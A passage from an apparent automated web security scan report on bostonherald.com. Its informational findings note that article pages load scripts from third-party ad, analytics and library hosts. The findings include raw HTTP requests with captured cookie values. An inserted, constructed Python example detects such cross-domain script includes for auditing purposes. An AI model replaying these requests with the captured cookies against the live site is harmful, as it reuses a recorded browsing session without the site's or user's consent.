User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.753. http://www.bostonherald.com/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.754. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.755. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.756. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.757. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.758. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
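
Findings 18.750 through 18.758 above all report the same condition: each bostonherald.com article page loads scripts from ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, and every one of those scripts runs with the page's own origin, so a compromise of any of those hosts is a compromise of the page. The Python below is an added example, not code from the scanner or from the site, that reproduces the check: it walks a response body, collects every `<script src>`, resolves relative and protocol-relative references, and reports the ones whose host differs from the page's host. The sample HTML is constructed to mirror the structure of the captured responses (a commented-out include, first-party includes, a tag split across two lines, and a duplicated include); the page URL is a placeholder, and comparing script host to page host exactly is an assumption about the scanner's rule rather than something the report states.

```python
"""Flag <script src> includes that a page pulls from hosts other than its own.

Added example; not the scanner's or the site's code. The sample HTML is
constructed. Exact hostname comparison is an assumption about the scanner's
rule; a registrable-domain comparison would flag the same hosts in the sample.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect (src, integrity) for every <script> start tag.

    HTMLParser hands the body of <!-- ... --> to handle_comment and never
    tokenizes tags inside it, so a commented-out include is not collected.
    Attribute parsing tolerates newlines, so a tag split over two lines
    (as in the captured responses) is handled like any other.
    """

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attrs = dict(attrs)
        src = attrs.get("src")
        if src:  # inline <script> blocks have no src and are not includes
            self.scripts.append((src.strip(), attrs.get("integrity")))


def cross_domain_scripts(page_url, html):
    """Return one record per distinct script URL whose host differs from the page host."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()

    findings, seen = [], set()
    for src, integrity in collector.scripts:
        # urljoin resolves relative ("/js/x.js") and protocol-relative
        # ("//host/x.js") references against the page URL.
        absolute = urljoin(page_url, src)
        parts = urlsplit(absolute)
        host = (parts.hostname or "").lower()
        if host == page_host or absolute in seen:
            continue
        seen.add(absolute)
        findings.append({
            "url": absolute,
            "host": host,
            # A plain-http include can be replaced on the wire as well as at its source.
            "plain_http": parts.scheme == "http",
            # Subresource Integrity pins a static file; it cannot pin an ad loader
            # whose content changes. None of the captured includes carry one.
            "has_sri": integrity is not None,
        })
    return findings


def format_report(page_url, html):
    """Render findings in the style of the 'Issue detail' sections above."""
    lines = ["The response dynamically includes the following scripts from other domains:"]
    for f in cross_domain_scripts(page_url, html):
        flags = []
        if f["plain_http"]:
            flags.append("plain http")
        if not f["has_sri"]:
            flags.append("no integrity attribute")
        lines.append(f"  {f['url']}  [{', '.join(flags)}]")
    return "\n".join(lines)


# Constructed sample: the hostnames are the ones seen in the captured responses,
# the paths are shortened and the page URL is a placeholder.
SAMPLE_URL = "http://www.bostonherald.com/track/inside_track/view/example/"
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<!-- // commented-out include, must not be reported
<script src="http://ads.example.invalid/old.js"></script> -->
<script src="/js/site.js"></script>
<script src="//www.bostonherald.com/js/same-host.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<script>var inline = 1;</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    print(format_report(SAMPLE_URL, SAMPLE_HTML))
```

Run against a saved response body (for example one captured with `curl -s` and the cookie header shown in the request above), the report lists each third-party host once, even when the same loader is included twice as show_ads.js is here. The two flags are the ones a practitioner would act on first: the includes are fetched over plain http, so they can be tampered with in transit, and none carries an integrity attribute, which is expected for ad and analytics loaders whose content changes but is worth adding for pinned library versions such as prototype.js 1.6.1.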

18.759. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
